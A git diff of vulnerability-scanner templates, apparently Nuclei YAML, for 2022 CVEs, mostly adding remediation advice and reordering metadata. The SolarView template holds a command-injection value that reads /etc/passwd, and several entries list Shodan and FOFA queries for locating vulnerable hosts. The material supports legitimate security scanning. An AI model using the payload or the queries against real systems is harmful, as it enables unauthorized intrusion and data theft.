--git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml index 791b863222..67fc26c094 100644 --- a/http/cves/2022/CVE-2022-4060.yaml +++ b/http/cves/2022/CVE-2022-4060.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Update to the latest version of the User Post Gallery plugin (>=2.20) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/8f982ebd-6fc5-452d-8280-42e027d01b1e - https://wordpress.org/plugins/wp-upg/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-4060 cwe-id: CWE-94 epss-score: 0.05043 - cpe: cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:* epss-percentile: 0.91883 + cpe: cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: odude product: user_post_gallery + framework: wordpress tags: unauth,wpscan,cve2022,rce,wordpress,wp-plugin,wp,cve,wp-upg http: diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 9e200b19ac..340dc73865 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -6,25 +6,25 @@ info: severity: critical description: | WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers. + remediation: Fixed in version 2.1.4.1. reference: - https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7 - https://wordpress.org/plugins/inpost-gallery/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4063 - remediation: Fixed in version 2.1.4.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4063 cwe-id: CWE-22 epss-score: 0.00819 - cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:* epss-percentile: 0.79674 + cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: pluginus product: inpost_gallery + framework: wordpress tags: cve,wp-plugin,wp,inpost-gallery,cve2022,lfi,wordpress,unauth,wpscan http: diff --git a/http/cves/2022/CVE-2022-40684.yaml b/http/cves/2022/CVE-2022-40684.yaml index 0db36c1329..846fbd622c 100644 --- a/http/cves/2022/CVE-2022-40684.yaml +++ b/http/cves/2022/CVE-2022-40684.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the necessary security patches or firmware updates provided by Fortinet to mitigate this vulnerability. reference: - https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py - https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/ @@ -18,8 +20,8 @@ info: cve-id: CVE-2022-40684 cwe-id: CWE-287 epss-score: 0.96782 - cpe: cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* epss-percentile: 0.9953 + cpe: cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: fortinet diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index cd34457517..d8e3438636 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F. + remediation: | + Upgrade to a patched version of Laravel Filemanager v2.5.1 or apply the recommended security patches provided by the vendor. reference: - https://github.com/UniSharp/laravel-filemanager/issues/1150 - https://nvd.nist.gov/vuln/detail/CVE-2022-40734 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-40734 cwe-id: CWE-22 epss-score: 0.00783 - cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:* epss-percentile: 0.79184 + cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.html:"Laravel Filemanager" verified: true + max-request: 2 vendor: unisharp product: laravel_filemanager + shodan-query: http.html:"Laravel Filemanager" tags: cve,cve2022,laravel,unisharp,lfi,traversal http: diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index 4353ea6ff2..8fc98c285f 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. + remediation: | + Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability. reference: - https://boschko.ca/tenda_ac1200_router - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843 @@ -15,8 +17,8 @@ info: cve-id: CVE-2022-40843 cwe-id: CWE-287 epss-score: 0.5155 - cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\(1576\):*:*:*:*:*:*:* epss-percentile: 0.97125 + cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\(1576\):*:*:*:*:*:*:* metadata: max-request: 1 vendor: tenda diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index b031d5b251..39b66b0432 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to a patched version of kkFileView or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://github.com/kekingcn/kkFileView/issues/389 - https://nvd.nist.gov/vuln/detail/CVE-2022-40879 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-40879 cwe-id: CWE-79 epss-score: 0.02057 - cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* epss-percentile: 0.87582 + cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.html:"kkFileView" + max-request: 1 vendor: keking product: kkfileview + shodan-query: http.html:"kkFileView" tags: cve,cve2022,kkFileView,xss http: diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index e86ddbd468..c7a0696a35 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SolarView Compact 6.00 is vulnerable to a command injection via network_test.php. + remediation: | + Apply the latest patch or upgrade to a non-vulnerable version of SolarView. reference: - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php - https://github.com/advisories/GHSA-wx3r-88rg-whxq @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-40881 cwe-id: CWE-77 epss-score: 0.94859 - cpe: cpe:2.3:o:contec:solarview_compact_firmware:6.00:*:*:*:*:*:*:* epss-percentile: 0.98977 + cpe: cpe:2.3:o:contec:solarview_compact_firmware:6.00:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:"-244067125" verified: true + max-request: 1 vendor: contec product: solarview_compact_firmware + shodan-query: http.favicon.hash:"-244067125" tags: cve,cve2022,solarview,rce,lfi variables: cmd: "cat${IFS}/etc/passwd" diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index 4539b8fe6c..2d4056fe62 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress IWS Geo Form Fields plugin (>=1.1) or apply the vendor-supplied patch to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/1fac3eb4-13c0-442d-b27c-7b7736208193 - https://wordpress.org/plugins/iws-geo-form-fields/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-4117 cwe-id: CWE-89 epss-score: 0.12065 - cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:* epss-percentile: 0.94628 + cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: iws-geo-form-fields_project product: iws-geo-form-fields + framework: wordpress tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan http: diff --git a/http/cves/2022/CVE-2022-4140.yaml b/http/cves/2022/CVE-2022-4140.yaml index b0fafeced2..b103b553c6 100644 --- a/http/cves/2022/CVE-2022-4140.yaml +++ b/http/cves/2022/CVE-2022-4140.yaml @@ -6,25 +6,25 @@ info: severity: high description: | WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Fixed in version 2.8.5. reference: - https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7 - https://wordpress.org/plugins/usc-e-shop/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4140 - remediation: Fixed in version 2.8.5. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-4140 cwe-id: CWE-552 epss-score: 0.00516 - cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.73753 + cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: collne product: welcart_e-commerce + framework: wordpress tags: usc-e-shop,wpscan,cve,cve2022,wp-plugin,wp,wordpress,lfi,unauthenticated http: diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index fe6314c609..9a57bb4d17 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ReQlogic v11.3. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-41441 - https://okankurtulus.com.tr/2023/01/17/reqlogic-v11-3-unauthenticated-reflected-cross-site-scripting-xss/ @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-41441 cwe-id: CWE-79 epss-score: 0.00104 - cpe: cpe:2.3:a:reqlogic:reqlogic:11.3:*:*:*:*:*:*:* epss-percentile: 0.41863 + cpe: cpe:2.3:a:reqlogic:reqlogic:11.3:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: http.html:"ReQlogic" + max-request: 2 vendor: reqlogic product: reqlogic + shodan-query: http.html:"ReQlogic" tags: packetstorm,cve,cve2022,xss,reqlogic http: diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index fce42916a7..5bd8161046 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Apply the latest security patch or upgrade to a newer version of RPCMS to mitigate the XSS vulnerability. reference: - https://github.com/ralap-z/rpcms/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2022-41473 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-41473 cwe-id: CWE-79 epss-score: 0.0332 - cpe: cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:* epss-percentile: 0.9008 + cpe: cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"RPCMS" verified: true + max-request: 1 vendor: 'rpcms' product: 'rpcms' + shodan-query: http.html:"RPCMS" tags: cve,cve2022,rpcms,xss http: diff --git a/http/cves/2022/CVE-2022-41840.yaml b/http/cves/2022/CVE-2022-41840.yaml index a8b3a2dfb8..3084754ade 100644 --- a/http/cves/2022/CVE-2022-41840.yaml +++ b/http/cves/2022/CVE-2022-41840.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion. + remediation: | + Upgrade Welcart eCommerce plugin to the latest version (>=2.7.8) or apply the provided patch to fix the LFI vulnerability. reference: - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-41840 cwe-id: CWE-22 epss-score: 0.00635 - cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.76449 + cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: collne product: welcart_e-commerce + framework: wordpress tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop http: diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index c1f0e4ac37..977282b0a7 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content. + remediation: | + Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor. reference: - https://github.com/backdrop/backdrop/releases/tag/1.23.0 - https://github.com/bypazs/CVE-2022-42094 @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-42094 cwe-id: CWE-79 epss-score: 0.00564 - cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:* epss-percentile: 0.74906 + cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:* metadata: - max-request: 4 verified: true + max-request: 4 vendor: backdropcms product: backdrop tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml index 65e69c32b5..ae0a23d0f8 100644 --- a/http/cves/2022/CVE-2022-42095.yaml +++ b/http/cves/2022/CVE-2022-42095.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content. + remediation: | + Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor. reference: - https://github.com/backdrop/backdrop/releases/tag/1.23.0 - https://github.com/bypazs/CVE-2022-42095 @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-42095 cwe-id: CWE-79 epss-score: 0.00431 - cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* epss-percentile: 0.71305 + cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: - max-request: 5 verified: true + max-request: 5 vendor: backdropcms product: backdrop_cms tags: cve,cve2022,xss,cms,backdrop,authenticated diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml index 8bf7a597be..f272390794 100644 --- a/http/cves/2022/CVE-2022-42096.yaml +++ b/http/cves/2022/CVE-2022-42096.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content. + remediation: | + Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor. reference: - https://github.com/backdrop/backdrop/releases/tag/1.23.0 - https://github.com/bypazs/CVE-2022-42096 @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-42096 cwe-id: CWE-79 epss-score: 0.00569 - cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* epss-percentile: 0.74992 + cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: - max-request: 5 verified: true + max-request: 5 vendor: backdropcms product: backdrop_cms tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml index 1f4e1e4294..981c768d31 100644 --- a/http/cves/2022/CVE-2022-42233.yaml +++ b/http/cves/2022/CVE-2022-42233.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Tenda 11N with firmware version V5.07.33_cn contains an authentication bypass vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest firmware update provided by Tenda to fix the authentication bypass vulnerability (CVE-2022-42233). reference: - https://github.com/D0ngsec/vulns/blob/main/Tenda/Tenda_11N_Authentication_Bypass.md - https://nvd.nist.gov/vuln/detail/CVE-2022-42233 @@ -15,15 +17,15 @@ info: cve-id: CVE-2022-42233 cwe-id: CWE-287 epss-score: 0.89148 - cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:* epss-percentile: 0.98301 + cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: product=="Tenda-11N-Wireless-AP" - shodan-query: http.title:"Tenda 11N" verified: true + max-request: 1 vendor: tenda product: 11n_firmware + shodan-query: http.title:"Tenda 11N" + fofa-query: product=="Tenda-11N-Wireless-AP" tags: cve,cve2022,tenda,auth-bypass,router,iot http: diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml index 42fbb10cdb..bb2a142929 100644 --- a/http/cves/2022/CVE-2022-4260.yaml +++ b/http/cves/2022/CVE-2022-4260.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup. + remediation: Fixed in version 1.69.1 reference: - https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260 - https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk - remediation: Fixed in version 1.69.1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-4260 cwe-id: CWE-79 epss-score: 0.00078 - cpe: cpe:2.3:a:wp-ban_project:wp-ban:*:*:*:*:*:wordpress:*:* epss-percentile: 0.32136 + cpe: cpe:2.3:a:wp-ban_project:wp-ban:*:*:*:*:*:wordpress:*:* metadata: - max-request: 4 verified: true - framework: wordpress + max-request: 4 vendor: wp-ban_project product: wp-ban + framework: wordpress tags: cve2022,wp-plugin,xss,wordpress,wpscan,wp,authenticated,cve,wp-ban http: diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index f68200b3a7..bcd5c1b983 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the indexFile parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: - https://fluidattacks.com/advisories/modestep/ - https://nvd.nist.gov/vuln/detail/CVE-2022-42746 @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-42746 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* epss-percentile: 0.28972 + cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"CandidATS" verified: true + max-request: 1 vendor: auieo product: candidats + shodan-query: http.html:"CandidATS" tags: cve,cve2022,candidats,xss http: diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index 521378ff57..e4fc5d20aa 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: - https://fluidattacks.com/advisories/modestep/ - https://fluidattacks.com/advisories/jcole/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-42747 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* epss-percentile: 0.28972 + cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"CandidATS" verified: true + max-request: 1 vendor: auieo product: candidats + shodan-query: http.html:"CandidATS" tags: cve,cve2022,candidats,xss http: diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index 4793e23357..f769c8aff8 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: - https://fluidattacks.com/advisories/modestep/ - https://fluidattacks.com/advisories/jcole/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-42748 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* epss-percentile: 0.28972 + cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"CandidATS" verified: true + max-request: 1 vendor: auieo product: candidats + shodan-query: http.html:"CandidATS" tags: cve,cve2022,candidats,xss http: diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index 63ec5e3c0b..8de7d1a687 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: - https://fluidattacks.com/advisories/modestep/ - https://fluidattacks.com/advisories/jcole/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-42749 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* epss-percentile: 0.28972 + cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"CandidATS" verified: true + max-request: 1 vendor: auieo product: candidats + shodan-query: http.html:"CandidATS" tags: cve,cve2022,candidats,xss http: diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index 740754517b..fc441ddb6d 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin. + remediation: | + Update to the latest version of the Show all comments plugin (7.0.1) or apply the vendor-supplied patch to fix the vulnerability. reference: - https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56 - https://nvd.nist.gov/vuln/detail/CVE-2022-4295 @@ -15,15 +17,15 @@ info: cve-id: CVE-2022-4295 cwe-id: CWE-79 epss-score: 0.00064 - cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:* epss-percentile: 0.26173 + cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - publicwww-query: /wp-content/plugins/show-all-comments-in-one-page verified: true - framework: wordpress + max-request: 1 vendor: appjetty product: show_all_comments + framework: wordpress + publicwww-query: /wp-content/plugins/show-all-comments-in-one-page tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page http: diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml index 9a847e8eee..e979aab6b4 100644 --- a/http/cves/2022/CVE-2022-4301.yaml +++ b/http/cves/2022/CVE-2022-4301.yaml @@ -6,24 +6,24 @@ info: severity: medium description: | WordPress Sunshine Photo Cart plugin before 2.9.15 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 2.9.15. reference: - https://wpscan.com/vulnerability/a8dca528-fb70-44f3-8149-21385039179d - https://nvd.nist.gov/vuln/detail/CVE-2022-4301 - remediation: Fixed in version 2.9.15. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4301 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:sunshinephotocart:sunshine_photo_cart:*:*:*:*:*:wordpress:*:* epss-percentile: 0.29012 + cpe: cpe:2.3:a:sunshinephotocart:sunshine_photo_cart:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: sunshinephotocart product: sunshine_photo_cart + framework: wordpress tags: cve,cve2022,xss,sunshine,wordpress,wp-plugin,wpscan,unauth http: diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 4ccf4ab5ab..1325a23249 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_joborderID.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43014 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-43014 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* epss-percentile: 0.29005 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: title:"OpenCATS" verified: true + max-request: 2 vendor: opencats product: opencats + shodan-query: title:"OpenCATS" tags: cve,cve2022,xss,opencats,authenticated 